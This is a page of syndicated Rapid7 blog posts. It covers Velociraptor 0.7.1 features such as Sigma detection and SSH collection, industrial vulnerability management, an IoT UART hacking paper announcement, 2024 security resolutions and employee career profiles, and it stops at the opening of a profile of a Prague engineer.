All posts by Rapid7

Velociraptor 0.7.1 Release: Sigma Support, ETW Multiplexing, Local Encrypted Storage and New VQL Capabilities Highlight the Last Release of 2023

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/12/29/velociraptor-0-7-1-release-sigma-support-etw-multiplexing-local-encrypted-storage-and-new-vql-capabilities-highlight-the-last-release-of-2023/

Velociraptor 0.7.1 Release: Sigma Support, ETW Multiplexing, Local Encrypted Storage and New VQL Capabilities Highlight the Last Release of 2023

Written by Dr. Michael Cohen

Rapid7 is excited to announce that version 0.7.1 of Velociraptor is live and available for download.  There are several new features and capabilities that add to the power and efficiency of this open-source digital forensic and incident response (DFIR) platform.

In this post, Rapid7 Digital Paleontologist, Dr. Mike Cohen discusses some of the exciting new features.

GUI improvements

The GUI was updated in this release to improve user workflow and accessibility.

Notebook improvements

Velociraptor uses notebooks extensively to facilitate collaboration, and post processing. There are currently three types of notebooks:

  1. Global Notebooks – these are available from the GUI sidebar and can be shared with other users for a collaborative workflow.
  2. Collection notebooks – these are attached to specific collections and allow post processing the collection results.
  3. Hunt notebooks – are attached to a hunt and allow post processing of the collection data from a hunt.

This release further develops the Global notebooks workflow as a central place for collecting and sharing analysis results.

Templated notebooks

Many users use notebooks heavily to organize their investigation and guide users on what to collect. While Collection notebooks and Hunt notebooks can already include templates there was no way to customize the default Global notebook.

In this release, we define a new type of Artifact of type NOTEBOOK which allows a user to define a template for global notebooks.

In this example I will create such a template to help users gather server information about clients. I click on the artifact editor in the sidebar, then select Notebook Templates from the search screen. I then edit the built in Notebooks. Default artifact.

Velociraptor 0.7.1 Release: Sigma Support, ETW Multiplexing, Local Encrypted Storage and New VQL Capabilities Highlight the Last Release of 2023
Adding a new notebook template

I can define multiple cells in the notebook. Cells can be of type vql, markdown or vql_suggestion. I usually use the markdown cells to write instructions for users of how to use my notebook, while vql cells can run queries like schedule collections or preset hunts.

Next I select the Global notebooks in the sidebar and click the New Notebook button. This brings up a wizard that allows me to create a new global notebook. After filling in the name of the notebook and electing which user to share it with, I can choose the template for this notebook.

Velociraptor 0.7.1 Release: Sigma Support, ETW Multiplexing, Local Encrypted Storage and New VQL Capabilities Highlight the Last Release of 2023
Adding a new notebook template

I can see my newly added notebook template and select it.

Velociraptor 0.7.1 Release: Sigma Support, ETW Multiplexing, Local Encrypted Storage and New VQL Capabilities Highlight the Last Release of 2023
Viewing the notebook from template

Copying notebook cells

In this release, Velociraptor allows copying of a cell from any notebook to the Global notebooks. This facilitates a workflow where users may filter, post-process and identify interesting artifacts in various hunt notebooks or specific collection notebooks, but then copy the post processed cell into a central Global notebook for collaboration.

For the next example, I collect the server artifact Server.Information.Clients and post process the results in the notebook to count the different clients by OS.

Velociraptor 0.7.1 Release: Sigma Support, ETW Multiplexing, Local Encrypted Storage and New VQL Capabilities Highlight the Last Release of 2023
Post processing the results of a collection

Now that I am happy with this query, I want to copy the cell to my Admin Notebook which I created earlier.

Velociraptor 0.7.1 Release: Sigma Support, ETW Multiplexing, Local Encrypted Storage and New VQL Capabilities Highlight the Last Release of 2023
Copying a cell to a global notebook

I can then select which Global notebook to copy the cell into.

Velociraptor 0.7.1 Release: Sigma Support, ETW Multiplexing, Local Encrypted Storage and New VQL Capabilities Highlight the Last Release of 2023
The copied cell still refers to the old collection

Velociraptor will copy the cell to the target notebook and add VQL statements to still refer to the original collection. This allows users of the global notebook to further refine the query if needed.

This workflow allows better collaboration between users.

VFS Downloads

Velociraptor’s VFS view is an interactive view of the endpoint’s filesystem. Users can navigate the remote filesystem using a familiar tree based navigation and interactively fetch various files from the endpoint.

Before the 0.7.1 release, the user was able to download and preview individual files in the GUI but it was difficult to retrieve multiple files downloaded into the VFS.

In the 0.7.1 release, there is a new GUI button to initiate a collection from the VFS itself. This allows the user to download all or only some of the files they had previously interactively downloaded into the VFS.

For example consider the following screenshot that shows a few files downloaded into the VFS.

Velociraptor 0.7.1 Release: Sigma Support, ETW Multiplexing, Local Encrypted Storage and New VQL Capabilities Highlight the Last Release of 2023
Viewing the VFS

I can initiate a collection from the VFS. This is a server artifact (similar to the usual File Finder artifacts) that simply traverses the VFS with a glob uploading all files into a single collection.

Velociraptor 0.7.1 Release: Sigma Support, ETW Multiplexing, Local Encrypted Storage and New VQL Capabilities Highlight the Last Release of 2023
Initiating a VFS collection

Using the glob I can choose to retrieve files with a particular filename pattern (e.g. only executables) or all files.

Velociraptor 0.7.1 Release: Sigma Support, ETW Multiplexing, Local Encrypted Storage and New VQL Capabilities Highlight the Last Release of 2023
Inspecting the VFS collection

Finally the GUI shows a link to the collected flow where I can inspect the files or prepare a download zip just like any other collection.

New VQL plugins and capabilities

This release introduces an exciting new capability: Built-in Sigma Support.

Built-in Sigma Support

Sigma is fast emerging as a popular standard for writing and distributing detections. Sigma was originally designed as a portable notation for multiple backend SIEM products: Detections expressed in Sigma rules can be converted (compiled) into a target SIEM query language (for example into Elastic queries) to run on the target SIEM.

Velociraptor is not really a SIEM in the sense that we do not usually forward all events to a central storage location where large queries can run on it. Instead, Velociraptor’s philosophy is to bring the query to the endpoint itself.

In Velociraptor, Sigma rules can directly be used on the endpoint, without the need to forward all the events off the system first! This makes Sigma a powerful tool for initial triage:

  • Apply a large number of Sigma rules on the local event log files.
  • Those rules that trigger immediately surface potentially malicious activity for further scrutiny.

This can be done quickly and at scale to narrow down on potentially interesting hosts during an IR. A great demonstration of this approach can be seen in the Video Live Incident Response with Velociraptor where Eric Capuano uses the Hayabusa tool deployed via Velociraptor to quickly identify the attack techniques evident on the endpoint.

Previously we could only apply Sigma rules in Velociraptor by bundling the Hayabusa tool, which presents a curated set of Sigma rules but runs locally. In this release Sigma matching is done natively in Velociraptor and therefore the Velociraptor Sigma project simply curates the same rules that Hayabusa curates but does not require the Hayabusa binary itself.

You can read the full Sigma In Velociraptor blog post that describes this feature in great detail, but here I will quickly show how it can be used to great effect.

First I will import the set of curated Sigma rules from the Velociraptor Sigma project by collecting the Server.Import.CuratedSigma server artifact.

Velociraptor 0.7.1 Release: Sigma Support, ETW Multiplexing, Local Encrypted Storage and New VQL Capabilities Highlight the Last Release of 2023
Getting the Curated Sigma rules

This will import a new artifact to my system with up to date Sigma rules, divided into different Status, Rule Level etc. For this example I will select the Stable rules at a Critical Level.

Velociraptor 0.7.1 Release: Sigma Support, ETW Multiplexing, Local Encrypted Storage and New VQL Capabilities Highlight the Last Release of 2023
Collecting sigma rules from the endpoint

After launching the collection, the artifact will return all the matching rules and their relevant events. This is a quick artifact taking less than a minute on my test system. I immediately see interesting hits.

Velociraptor 0.7.1 Release: Sigma Support, ETW Multiplexing, Local Encrypted Storage and New VQL Capabilities Highlight the Last Release of 2023
Detecting critical level rules

Using Sigma rules for live monitoring

Sigma rules can be used on more than just log files. The Velociraptor Sigma project also provides monitoring rules that can be used on live systems for real time monitoring.

The Velociraptor Hayabusa Live Detection option in the Curated import artifact will import an event monitoring version of the same curated Sigma rules. After adding the rule to the client’s monitoring rules with the GUI, I can receive interesting events for matching rules:

Velociraptor 0.7.1 Release: Sigma Support, ETW Multiplexing, Local Encrypted Storage and New VQL Capabilities Highlight the Last Release of 2023
Live detection of Sigma rules

Other Improvements

SSH/SCP accessor

Velociraptor normally runs on the endpoint and can directly collect evidence from the endpoint. However, many devices on the network can not install an endpoint agent – either because the operating system is not supported (for example embedded versions of Linux) or due to policy.

When we need to investigate such systems we often can only access them by Secure Shell (SSH). In the 0.7.1 release, Velociraptor has an ssh accessor which allows all plugins that normally use the filesystem to transparently use SSH instead.

For example, consider the glob() plugin which searches for files.

Velociraptor 0.7.1 Release: Sigma Support, ETW Multiplexing, Local Encrypted Storage and New VQL Capabilities Highlight the Last Release of 2023
Globing for files over SSH

We can specify that the glob() use the ssh accessor to access the remote system. By setting the SSH_CONFIG VQL variable, the accessor is able to use the locally stored private key to be able to authenticate with the remote system to access remote files.

We can combine this new accessor with the remapping feature to reconfigure the VQL engine to substitute the auto accessor with the ssh accessor when any plugin attempts to access files. This allows us to transparently use the same artifacts that would access files locally, but this time transparently will access these files over SSH:

Velociraptor 0.7.1 Release: Sigma Support, ETW Multiplexing, Local Encrypted Storage and New VQL Capabilities Highlight the Last Release of 2023
Remapping the auto accessor with ssh

This example shows how to use the SSH accessor to investigate a debian system and collect the Linux.Debian.Packages artifact from it over SSH.

Distributed notebook processing

While Velociraptor is very efficient and fast, and can support a large number of endpoints connected to the server, many users told us that on busy servers, running notebook queries can affect server performance. This is because a notebook query can be quite intense (e.g. Sorting or Grouping a large data set) and in the default configuration the same server is collecting data from clients, performing hunts, and also running the notebook queries.

This release allows notebook processors to be run in another process. In Multi-Frontend configurations (also called Master/Minion configuration), the Minion nodes will now offer to perform notebook queries away from the master node. This allows this sudden workload to be distributed to other nodes in the cluster and improve server and GUI performance.

ETW Multiplexing

Previous support for Event Tracing For Windows (ETW) was rudimentary. Each query that called the watch_etw() plugin to receive the event stream from a particular provider created a new ETW session. Since the total number of ETW sessions on the system is limited to 64, this used precious resources.

In 0.7.1 the ETW subsystem was overhauled with the ability to multiplex many ETW watchers on top of the same session. The ETW sessions are created and destroyed on demand. This allows us to more efficiently track many more ETW providers with minimal impact on the system.

Additionally the etw_sessions() plugin can show statistics for all sessions currently running including the number of dropped events.

Artifacts can be hidden in the GUI

Velociraptor comes with a large number of built in artifacts. This can be confusing for new users and admins may want to hide artifacts in the GUI.

You can now hide an artifact from the GUI using the artifact_set_metadata() VQL function. For example the following query will hide all artifacts which do not have Linux in their name.

Velociraptor 0.7.1 Release: Sigma Support, ETW Multiplexing, Local Encrypted Storage and New VQL Capabilities Highlight the Last Release of 2023

Only Linux related artifacts will now be visible in the GUI.

Velociraptor 0.7.1 Release: Sigma Support, ETW Multiplexing, Local Encrypted Storage and New VQL Capabilities Highlight the Last Release of 2023
Hiding artifacts from the GUI

Local encrypted storage for clients

It is sometimes useful to write data locally on endpoints instead of transferring the data to the server. For example, if the client is not connected to the internet for long periods it is useful to write data locally. Also useful is to write data in case we want to recover it later during an investigation.

The downside of writing data locally on the endpoints is that this data may be accessed if the endpoint is later compromised. If the data contains sensitive information this can be used by an attacker. This is also primarily the reason that Velociraptor does not write a log file on the endpoint. Unfortunately this makes it difficult to debug issues.

The 0.7.1 release introduces a secure local log file format. This allows the Velociraptor client to write to the local disk in a secure way. Once written the data can only be decrypted by the server.

While any data can be written to the encrypted local file, the Generic.Client.LocalLogs artifact allows Velociraptor client logs to be written at runtime.

Velociraptor 0.7.1 Release: Sigma Support, ETW Multiplexing, Local Encrypted Storage and New VQL Capabilities Highlight the Last Release of 2023
Writing local logs

To read these locally stored logs I can fetch them using the Generic.Client.LocalLogsRetrieve artifact to retrieve the encrypted local file. The file is encrypted using the server’s public key and can only be decrypted on the server.

Velociraptor 0.7.1 Release: Sigma Support, ETW Multiplexing, Local Encrypted Storage and New VQL Capabilities Highlight the Last Release of 2023
Inspecting the uploaded encrypted local file

Once on the server, I can decrypt the file using the collection’s notebook which automatically decrypts the uploaded file.

Velociraptor 0.7.1 Release: Sigma Support, ETW Multiplexing, Local Encrypted Storage and New VQL Capabilities Highlight the Last Release of 2023
Decrypting encrypted local file

Conclusions

There are many more new features and bug fixes in the 0.7.1 release. If you’re interested in any of these new features, we welcome you to take Velociraptor for a spin by downloading it from our release page. It’s available for free on GitHub under an open-source license.

As always, please file bugs on the GitHub issue tracker or submit questions to our mailing list by emailing [email protected]. You can also chat with us directly on our Discord server.

Learn more about Velociraptor by visiting any of our web and social media channels below:

Mastering Industrial Cybersecurity: The Significance of Combining Vulnerability Management with Detection and Response

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/12/28/mastering-industrial-cybersecurity-the-significance-of-combining-vulnerability-management-with-detection-and-response/

Mastering Industrial Cybersecurity: The Significance of Combining Vulnerability Management with Detection and Response

Written by Elad Ben-Meir, CEO SCADAfence, a Honeywell company.

In today’s digital era, where industries are increasingly reliant on advanced technologies, safeguarding critical infrastructure against cyber threats has become paramount. The convergence of operational technology (OT) and information technology (IT) has ushered in new efficiencies but has also exposed vulnerabilities. This article explores the pivotal role of Vulnerability Management and Detection and Response (VM/DR) in the realm of Industrial Cybersecurity.

Introduction to Industrial Cybersecurity

In an interconnected world, the importance of cybersecurity cannot be overstated. In industrial settings, where the consequences of cyberattacks can extend beyond data breaches to impact physical safety and operational continuity, cybersecurity is a top priority. This article delves into the significance of VM/DR in fortifying industrial cybersecurity defenses.

Vulnerability Management and Detection and Response (VM/DR) in Industrial Context

VM/DR are not mere buzzwords, but a proactive strategy to combat the ever-evolving cyber threats facing industrial organizations and the small talent pool from which they hire. It entails continuous monitoring, rapid threat detection, and efficient incident response while understanding the industrial processes these technologies control. In the context of industrial operations, VM/DR takes on added significance as it safeguards critical processes from disruption.

The Core Components of Industrial VM/DR

A successful VM/DR program in an industrial setting comprises several key components:

  • Real-time threat monitoring: This involves continuous surveillance of network traffic and system activities to detect anomalies and potential threats.
  • Incident detection and analysis: Rapid identification and thorough analysis of security incidents are crucial for timely response and mitigation.
  • Incident response and remediation: An effective response strategy is vital to minimize the impact of cyber incidents and promptly restore normal operations.

These components work in tandem to provide a comprehensive security shield against industrial cyber threats.

Utilizing SCADAfence’s real-time passive threat monitoring alongside Rapid7’s InsightVM and InsightIDR products allows for industrial–focused threats to be detected, analyzed, responded to, and remediated in a timely manner.

Industrial-Specific Threats and Vulnerabilities

In the industrial landscape, cyber threats go beyond traditional IT concerns. Attack vectors extend to Industrial Control Systems (ICS), which govern critical processes. Vulnerabilities unique to OT systems, such as legacy equipment and proprietary protocols, pose additional challenges. Understanding these threats is essential for effective protection.

The Landscape of Industrial Threats and Vulnerabilities

Industrial systems are the backbone of modern society, controlling everything from power grids to manufacturing processes. With connectivity becoming ubiquitous, these systems have become prime targets for malicious actors.

Reference: According to a report by IBM X-Force, attacks on industrial systems increased by over 2000% in 2020, highlighting the growing threat landscape in the industrial sector.

Legacy Systems and Proprietary Protocols

Many industrial environments still rely on legacy systems that were not designed with modern cybersecurity in mind. These aging systems often run on proprietary protocols, making them vulnerable to exploitation.

Reference: The Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) has noted an increase in vulnerabilities related to legacy systems and proprietary protocols in their annual reports.

Human Error and Insider Threats

Human error remains a significant factor in industrial incidents. Insider threats, whether intentional or unintentional, can have catastrophic consequences in industrial settings.

Reference: A study by Ponemon Institute found that 57% of industrial organizations surveyed had experienced at least one insider threat incident in the past year.

Supply Chain Vulnerabilities

Industrial systems rely on a complex network of suppliers and vendors. Weak links in the supply chain can introduce vulnerabilities that adversaries could exploit.

Reference: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued alerts about supply chain vulnerabilities in industrial control systems.

IoT and Edge Devices

The proliferation of Internet of Things (IoT) devices and edge computing has expanded the attack surface in industrial environments. These devices are often inadequately secured.

Reference: A report from Kaspersky highlights a 46% increase in attacks on IoT devices in the first half of 2020, with many incidents affecting industrial sectors.

Ransomware Targeting Critical Infrastructure

Ransomware attacks have evolved to target critical infrastructure, disrupting essential services and demanding hefty ransoms.

Reference: The Colonial Pipeline ransomware attack in May 2021 brought widespread attention to the threat of ransomware against critical infrastructure.

Integration with Existing Workflows/Playbooks

VM/DR is not a standalone solution but a complement to existing industrial workflows and/or playbooks. It bridges the gap between IT and OT, breaking down silos that often hinder effective cybersecurity. By integrating VM/DR seamlessly into existing processes, organizations can enhance their ability to promptly respond to threats. Having detailed playbooks with key operational Points of Contact (POC) helps to reduce dead time when dealing with a business and process interruption inside of an industrial process.

Implementing response and action plans within the current organization’s workflows helps analysts better communicate in the operational verbiage and expedites remediations directly in the field. This alleviates IT’s need for Confidentiality, Integrity, and Availability (CIA) and supports OT’s requirements for Availability, Integrity, Confidentiality (AIC).

Measuring Success with Key Performance Indicators (KPIs)

Success in industrial VM/DR can be quantified through various KPIs:

  • Time to detect (TTD): The speed at which threats are identified
  • Time to Respond (TTR): The efficiency of incident response
  • Incident Resolution Rate: The effectiveness of mitigation efforts

These KPIs provide a tangible measure of an organization’s cybersecurity resilience.

Collaboration between IT and OT

The collaboration between IT and OT teams is pivotal in industrial cybersecurity. VM/DR serves as a unifying force, facilitating communication and coordination between these traditionally separate domains. This collaboration is vital for the timely identification and mitigation of threats.

Compliance and Regulatory Considerations

Industrial organizations are subject to various cybersecurity regulations and standards such as the North American Electric Reliability Corporation Critical Infrastructure Protection (NERC CIP). NERC CIP regulatory compliance is a set of mandatory cybersecurity standards and requirements designed to safeguard the North American power grid’s critical infrastructure.

These regulations are a response to the increasing cybersecurity threats faced by the energy sector. NERC CIP compliance mandates that electric utilities and power generation companies establish and maintain robust cybersecurity programs, including measures such as access controls, incident response planning, and regular security assessments. The primary goal of NERC CIP is to ensure the reliable operation of the electric grid while minimizing vulnerabilities to cyberattacks, thus safeguarding the continuous supply of electricity to homes, businesses, and critical infrastructure across North America. Compliance with NERC CIP is essential to maintain the security and resilience of the energy sector in the face of evolving cybersecurity threats.

Implementing a compliance governance portal is a strategic move for organizations seeking to streamline and centralize their compliance management efforts. Such a portal serves as a centralized platform where compliance policies, procedures, and documentation can be efficiently stored, accessed, and monitored. It facilitates real-time tracking of compliance activities, automates workflow processes, and provides a comprehensive view of the organization’s adherence to regulatory requirements.

This not only enhances transparency and accountability but also simplifies reporting and auditing. The implementation of a compliance governance portal empowers organizations to proactively manage risk, ensure regulatory adherence, and respond swiftly to compliance-related challenges, ultimately fostering a culture of compliance throughout the organization. VM/DR plays a crucial role in helping organizations meet compliance requirements, providing assurance to regulators and stakeholders.

Securing the Future

In the face of relentless cyber threats, mastering industrial cybersecurity is not a luxury – it’s a necessity. VM/DR is the linchpin that empowers organizations to fortify their defenses, protect critical infrastructure, and ensure operational continuity in an increasingly digital world.

As digital transformation continues, industrial VM/DR represents a proactive, adaptive, and collaborative approach to safeguarding the backbone of our society. It’s time for industrial organizations to embrace VM/DR and secure their future.

There’s One Last Gift Under the Tree, It’s Hands-On IoT!

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/12/27/theres-one-last-gift-under-the-tree-its-hands-on-iot/

There’s One Last Gift Under the Tree, It’s Hands-On IoT!

It’s the holiday season and since we’re in a giving mood we thought we’d surprise our loyal readers with a fun, hands-on hardware exercise to enjoy during some well-earned downtime.

But first, a little background. Every year Rapid7 has a pretty solid presence at DefCon in Las Vegas. This year was no exception. One of the cornerstones of our DefCon experience is participating in the IoT Village. Deral Heiland, our Principal Security Researcher for IoT, takes attendees through each of the steps of breaking into a particular piece of IoT hardware. And every year we release his talk (with a few additions) for those who couldn’t make it to Vegas for the conference.

What we have here is this year’s Hands-On IoT presentation for the hacking of an IP camera over Universal Asynchronous Receiver/Transmitter (UART). It’s Deral’s original presentation with some added details and context. In this paper, Deral takes you step by step through the process, offering insight into how UART and U-Boots operate, as well as some troubleshooting techniques should your attempts not work as seamlessly as Deral’s.

Typically, we would release Deral’s presentation in a series of blog posts over a few weeks. But this year we decided to spare y’all the suspense each week and release it as one comprehensive paper. We hope you enjoy reading it as much as we enjoyed making it and we wish you all the best this holiday season.

Click here to download the paper.

We Asked ChatGPT for 2024 Cybersecurity Predictions but You Should Make These Resolutions Instead

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/12/18/we-asked-chatgpt-for-2024-cybersecurity-predictions-but-you-should-make-these-resolutions-instead/

We Asked ChatGPT for 2024 Cybersecurity Predictions but You Should Make These Resolutions Instead

By Caitlin Condon, Senior Manager, Vulnerability Research at Rapid7, and Christiaan Beek, Senior Director, Threat Analytics at Rapid7

It’s that time of year again — time for the annual tradition of cybersecurity predictions. Here at Rapid7 we’ve seen a whole lot of threats and exploited vulnerabilities in 2023, many in the form of zero days. So it can be a little overwhelming to think about what could be in store for us in the year ahead.

We thought we’d start off by asking ChatGPT for its predictions.

Unsurprisingly, it gave the answer, “increased emphasis on AI and machine learning.” ChatGPT explained that AI-driven systems can better analyze and detect anomalies, and that we may see even more AI-powered tools for threat detection, response, and automation.

Well, there you have it folks, ChatGPT TO THE RESCUE!

This “prediction” is pretty obvious, and everyone in the cybersecurity industry knows it. But more importantly, it doesn’t solve the huge issue that exists in the cybersecurity industry: We’re all focusing on what could be without having the basic mechanisms in place to address what is.

So instead of making 2024 cybersecurity predictions, we suggest you make the following three resolutions and a promise to yourself that you will lay the groundwork to make them happen in 2024.

Resolution 1: Just implement MFA already

It seems like every CISO has spent 2023 getting up to speed on AI. Certainly AI will play an important role in 2024, both in the opportunities it presents to defenders as well as the security challenges it brings.

From a cybersecurity standpoint, however, it’s still important to keep your business focused on the basics such as correctly implemented multi-factor authentication (MFA). That’s because in 2024, a business is significantly more likely to be breached due to weak MFA than it is by an advanced-AI cyber attack.

Our 2023 Mid-Year Threat Report found that 40% of incidents in the first half of the year stemmed from non-existent or poorly enforced MFA. Our message is simple: implement MFA now, particularly for VPNs and virtual desktop infrastructure. It’s the best and most important accomplishment you can make if you haven’t yet done so.

Resolution 2: Learn from what file transfer vendors did right

Without a doubt, 2023 was the year of file transfer vulnerabilities, with MOVEit Transfer dominating headlines. However, we expect 2024 to be slightly different based on our experience with these vendors’ response processes.

The file transfer software providers Rapid7 researchers disclosed vulnerabilities to were extremely responsive, fixing vulnerabilities in half the time it usually takes and proactively looking at ways to mature their vulnerability disclosure programs.

In fact, some of these organizations now have more established patch cycles and vulnerability disclosure mechanisms in place (hooray!), as well as security programs implemented where products are reviewed more frequently. These proactive cycles should result in more mature, security-bolstering software development practices — at least for these solution providers and those who have learned from them — in 2024.

Resolution 3: Get a grip on your data

Lots of data does not equal effective security analysis. We all get fatigued and miss things when we feel overwhelmed and overstretched. And well, the same happens to security teams when they are just given enormous amounts of raw data. Context is everything! It’s the missing piece of the puzzle to improving security posture and the effectiveness of solutions.

Spending more money or gathering more data is not going to improve your cybersecurity posture, but understanding data and, more importantly, what kind of data is needed to make better decisions will. Less is more is our credo for 2024. For example, take time to understand what data you are already collecting from a log perspective. Understand what type of data is inside those logs and how that data might indicate a possible attack technique. If you have only partially the right information, what type of data would you need to enrich that for enough context to decide or prioritize events?

Bonus: Take some time to decompress

Trust us, we know that for defenders taking time to decompress is easier said than done, but it’s so important to look after ourselves and avoid burnout. Our advice to you is put your coverage plan in place, communicate it well, and most importantly, take the time you need. Even Gartner has predicted that 25% of cybersecurity leaders will change roles entirely by 2025 due to work-related stress. So, make sure you take the time to decompress, relax, and enjoy life.

For insights from the Rapid7 team on what 2024 could bring, watch the Top Cybersecurity Predictions webinar on-demand.

Living our Values and Leveraging Diverse Skill Sets: How Jonathan Atwood Built a Successful Career as a Customer Advisor at Rapid7

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/12/11/living-our-values-and-leveraging-diverse-skill-sets-how-jonathan-atwood-built-a-successful-career-as-a-customer-advisor-at-rapid7/

Living our Values and Leveraging Diverse Skill Sets: How Jonathan Atwood Built a Successful Career as a Customer Advisor at Rapid7

At Rapid7, our Customer Advisors play a pivotal role at ensuring our customers understand their threat landscape – and feel confident in their security programs. By collaborating across various internal teams, strengthening customer relationships, and proactively seeking solutions and advocating for customer needs, Customer Advisors have a direct impact on the fortunes of our business. To do this successfully requires a clear understanding of Rapid7’s core values and associated behaviors as well as an equal balance of strong technical knowledge and exceptional customer relationship skills.

Jonathan: “You need to create a strong relationship with customers to fully understand their needs and their business. You also have to be able to talk in detail about very technical scenarios. This requires having some experience or education in the cybersecurity field as well as the ability to relay information to our engineers and developers. Customers are extremely aware of the potential risks a security event may pose to their businesses, so it’s important their questions are answered in detail. This enables a clear understanding of what is happening in their environments.”

In addition to presenting and reviewing activity reports, Customer Advisors like Jonathan take a proactive approach to providing guidance and advice on all aspects of a customer’s security ecosystem.

Jonathan: “I may be asked to advise on reviewing the results of a recent Pen test, break down a bug or issue with a particular piece of code, or speak up if there is a storage container system they are using that I wouldn’t agree with or recommend”.

Jonathan also notes that the requirements for each customer can also vary depending on industry or field, based on specific security frameworks that may be in place that govern how they do business. Understanding these requirements helps provide additional guidance and shape recommendations for the unique needs of individual customers.

Jonathan: “HIPAA is a common example of a security framework. So if I have a customer who is in the medical field, I’m also thinking of the regulations in place for protecting patient health information and how to best advise them based on those specific requirements.”

While the role is dynamic and requires a wide range of skills to be successful, Jonathan says it’s the ability to see the impact of his work that he finds most rewarding.

Jonathan: “I’ve always had an aspiration to help people. In this role, I can feel the impact my work has on the customer as well as internally at Rapid7. When I have provided the right guidance and solutions and they are happy with our services, that leads to customer renewals and helps you feel like you’re contributing directly to the success of the business.”

The responsibility for cultivating relationships isn’t limited to external customers. For Jonathan, building internal relationships helps him drive positive impact in his role and for his own development and growth.

Jonathan: “Collaboration is a huge part of Rapid7’s culture. You should never be afraid of reaching out to ask a question or to raise your hand if you need help. Any time I’ve reached out to someone with a question – whether it was big or small, in a team chat or a 1:1 conversation, everyone has always been willing to jump in and help.

“We talk a lot about our values as a company, and when it comes to those Rapid7 core values like Advocating for Customers, Challenging Convention, and Impacting Together, we all understand that having these conversations helps get us to the best possible outcome. Additionally, the events the company hosts to  bring people from different teams together are helpful in understanding how different teams operate and how you might eventually partner together in the future.”

An emphasis on collaboration and a deep dive of Rapid7’s core values are key elements of a new hire’s global onboarding program. The current program combines a mix of company education (culture, values, benefits processes, etc.) with programs specific to each person’s role or team.

Jonathan: “Once hired, I would recommend fully taking advantage of the first few weeks of onboarding. A lot of content is self paced, and it sets a good foundation of how to be successful at Rapid7 as well as imparts information about our products and services. I also recommend new Customer Advisors become certified for Insight IDR. As an employee, you can take the test for free, and it gives you a great foundation to build on. This is also a great time to shadow some calls to get familiar with some common topics and questions that might come up.”

Throughout onboarding and beyond, Jonathan also states the importance of being eager to learn (reflected in Rapid7’s “Never Done” core value).

Jonathan: “For new hires in this role, come in with an open mind and be ready to learn and ask questions. This is a very complex role, and it can be stressful at times due to the nature of our industry. The more you recognize and seek the experience and feedback of those around you, the more successful you will be. Take advantage of opportunities to learn and grow throughout your time here – not just as a new hire.”

Rapid7 is continuing to grow teams in locations around the world. Learn more about career opportunities or browse all open jobs.

A Trusted Voice in a Crowded Market: Meet Joanne Guariglia, Senior Channel Account Manager at Rapid7

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/12/05/a-trusted-voice-in-a-crowded-market-meet-joanne-guariglia-senior-channel-account-manager-at-rapid7/

A Trusted Voice in a Crowded Market: Meet Joanne Guariglia, Senior Channel Account Manager at Rapid7

When you’re a seller, it’s important to represent a reputable brand and products you can stand behind. For many companies, their partners act as an extension of the sales team to help identify and engage new customers. As a Senior Channel Account Manager, Joanne Guariglia shares what she loves most about her role, Rapid7, and why now is a great time to join the team.

What is it that initially attracted you to Rapid7?

In my previous role, I was with a company that had an integration with Rapid7 so I had been working in tandem with some of the leadership team. They were always down to earth, very genuine,open and honest about the great things happening, and what some of the challenges were. My partners also enjoyed working with the Rapid7 team and I could see they were making waves in the partner community.

Aside from that, Rapid7 is not just a single solution. Our products can meet customers where they are in their security journey, and grow and scale with them. So having that ability to grow alongside customers was something that I was really interested in.

Would you say a cybersecurity background is required for your role? What skills or knowledge is most important?

I wouldn’t necessarily say a cyber background is a must have before joining Rapid7. We have a comprehensive onboarding program that can help give you a strong foundation in cyber security knowledge as well as our products and services. What’s most important is your ability to grow relationships with our partners and to bring the best technology and solutions to the customer. This is a role where you have to be an effective communicator and a bridge between cross functional teams including Sales, Marketing, Customer Success, Sales Operations, Finance, and the Renewals team to make sure we are aligned on business decisions moving forward. Having that collaboration between teams and knowing we are all working towards the same goal has been really rewarding.

What does the cybersecurity landscape look like, and how does Rapid7 differentiate itself from competitors?

When it comes to the landscape, cyber criminals are always evolving their tactics and continue to increase efforts against businesses of all sizes. Security is not a ‘nice to have’; It’s  a priority for all businesses and industries, so it’s a field that’s very stable and always growing.

Cybersecurity can also be challenging because it is a crowded market but where Rapid7 has a competitive advantage is in consolidation. Our customers don’t have to work with multiple vendors to satisfy all aspects of their security needs, we can consolidate multiple products and offerings into one cost with one vendor. We’ve come a long way in growing our portfolio and responding to the customers needs, and we are well positioned to continue that growth into 2024 and beyond.

What do you find most rewarding about your role?

What I enjoy most is being able to build lasting relationships with our partners. Partners want to work with trusted brands that are leaders in the space and we have that here at Rapid7. Being that trusted voice and growing the relationship, while educating them about our offerings, enables me to have a positive impact.

Another thing I find rewarding is the ability to create change and outcomes that our partners find valuable. We are a large company, but we are still agile enough to pivot when needed and our culture is one that is supportive of asking questions and sharing new ideas that we can bring to fruition.

What are you most excited for in 2024?

2024 is exciting because our channel team is at the forefront of impacting growth across the organization. We are investing heavily in our partnerships and partner programs, and are making strides with the channel community more than ever. Our company strategy and goals are really clear, and we’re all excited to execute and drive positive impact for the business.

With incredible product offerings and an opportunity to foster and grow partner relationships, there is no better time to be a part of this journey. 2024 is going to be a huge year for us!

Interested in learning more about working for Rapid7? Click here for our careers page, or view all open sales opportunities.

Building our Team in Prague: Meet Martin Votruba

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/11/27/building-our-team-in-prague-meet-martin-votruba/

Building our Team in Prague: Meet Martin Votruba

From developing driver-assistance software for a luxury car brand to jumping on board an NFT startup, Martin Votruba, Lead Software Engineer, is not one to shy away from a challenge. In September of 2023, joined Rapid7 as the first hire in its new Prague office. Martin is leveraging Rapid7’s excitement and energy of a startup while having the resources and support of an established organization to build a new team in Prague. He sat down to share his experience as one of the first employees in Prague, and discuss how Rapid7’s culture of collaboration and continuous learning helped him build a successful foundation on which to grow his team.

How have your past experiences contributed to how you approach your role today?

